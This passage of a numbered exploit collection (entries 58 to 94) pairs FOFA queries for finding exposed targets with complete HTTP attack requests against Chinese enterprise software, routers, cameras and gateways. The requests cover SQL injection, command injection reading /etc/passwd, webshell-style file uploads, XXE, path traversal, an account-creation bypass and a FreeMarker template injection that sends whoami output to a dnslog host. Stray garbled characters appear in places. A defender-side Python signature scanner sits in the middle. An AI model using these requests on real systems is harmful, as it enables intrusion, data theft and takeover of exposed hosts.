User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" ^0 U8 X+ l( u; C" d( C! T
Accept-Charset: utf-8
* r# W+ }" S6 w+ H- JAccept-Encoding: gzip, deflate1 {# Q5 [) @4 B4 x) @3 B
Connection: close
# F$ M4 p/ R9 V4 U
) C+ s5 J: B7 k4 Z+ a+ q' P( o- d  N  V3 ]7 o, A( C1 r- ^& V
58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A


64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing in lines 42 and 43 of the response proves the vulnerability is present.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp


68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 1670

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD


75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD


84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp


86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php


88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php


89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
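
The requests in entries 57 to 91 reduce to a handful of shapes that can be matched in access logs or at a reverse proxy: MSSQL time-based and error-based injection (WAITFOR DELAY, HashBytes, @@version), UNION injection, path traversal including the "..;/" segment used in entry 91, FreeMarker template expressions (entries 76 and 84) and shell metacharacters at the start of a parameter value (entries 62, 75, 79, 82, 86, 88 and 90). The Python below is an added, defender-side example (not code from the original post or from any of the listed products); the rule names are constructed for the example and the sample requests are constructed from those entries with placeholder hosts and values.

```python
"""Signature scan over URL-decoded HTTP request lines and bodies.

Added example for this post, not code from the original or from any of
the listed products. Input is URL-decoded until stable before matching,
so double-encoded variants are seen. Rule names and sample requests are
constructed for the example.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

RULES = [
    ("sqli-mssql-timing", re.compile(r"waitfor\s+delay", re.I)),
    ("sqli-mssql-error", re.compile(r"hashbytes\s*\(|fn_varbintohexstr|fn_sqlvarbasetostr|@@version", re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    # "../", "..\" and the Tomcat-style "..;/" segment are all traversal.
    ("path-traversal", re.compile(r"\.\.;?[/\\]")),
    ("ssti-freemarker", re.compile(r"<#assign\b|\?new\(\)|freemarker\.template\.utility\.Execute", re.I)),
    # A parameter value that begins with a pipe, backtick or newline, or contains ${IFS}.
    ("cmd-injection", re.compile(r'[=&]"?(?:\||`|[\r\n])|\$\{IFS\}')),
]


def decode(value: str) -> str:
    """URL-decode repeatedly (at most three rounds) until the text stops changing."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(request_line: str, body: str = "") -> List[str]:
    """Return the names of all rules matching the decoded request line or body."""
    text = decode(request_line) + " \n" + decode(body)
    return [name for name, pattern in RULES if pattern.search(text)]


# (label, request line, body): constructed after the numbered entries above.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("entry-57 style", "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1", ""),
    ("entry-69 style", "GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1", ""),
    ("entry-66 style", "GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27))%2CNULL-- HTTP/1.1", ""),
    ("entry-91 style", "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../etc/passwd HTTP/1.1", ""),
    ("entry-63 style", "POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1", "path=..%2Fconfig.ini&filename=1&action=download"),
    ("entry-84 style", "POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1",
     '{"sql": "<#assign ex=\\"freemarker.template.utility.Execute\\"?new()>${ex(\\"id\\")}", "type": "0"}'),
    ("entry-79 style", "GET /goform/webRead/open/?path=|id HTTP/1.1", ""),
    ("entry-86 style", "POST /cgi-bin/network_test.php HTTP/1.1", "host=%0acat${IFS}/etc/passwd%0a&command=ping"),
    ("benign", "GET /index.html?lang=en-US&page=2 HTTP/1.1", ""),
]


def scan_all(requests: List[Tuple[str, str, str]] = SAMPLE_REQUESTS) -> Dict[str, List[str]]:
    """Map each sample label to the rules it triggers."""
    return {label: scan_request(line, body) for label, line, body in requests}


if __name__ == "__main__":
    for label, hits in scan_all().items():
        print(f"{label:15} {', '.join(hits) or '-'}")
```

Decoding before matching matters: entry 63 sends the traversal as "..%2F" and entry 69 sends WAITFOR DELAY with "%20" and "%27", so a rule applied to the raw line would miss both. For the two FreeMarker cases the durable fix sits in the application rather than the proxy: FreeMarker's Configuration.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER) disables the ?new built-in that both entries depend on.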


92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. Qi An Xin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 d9 d5 s5 |" u3 O% q% Y; C2 L% @

94. Qi-Anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
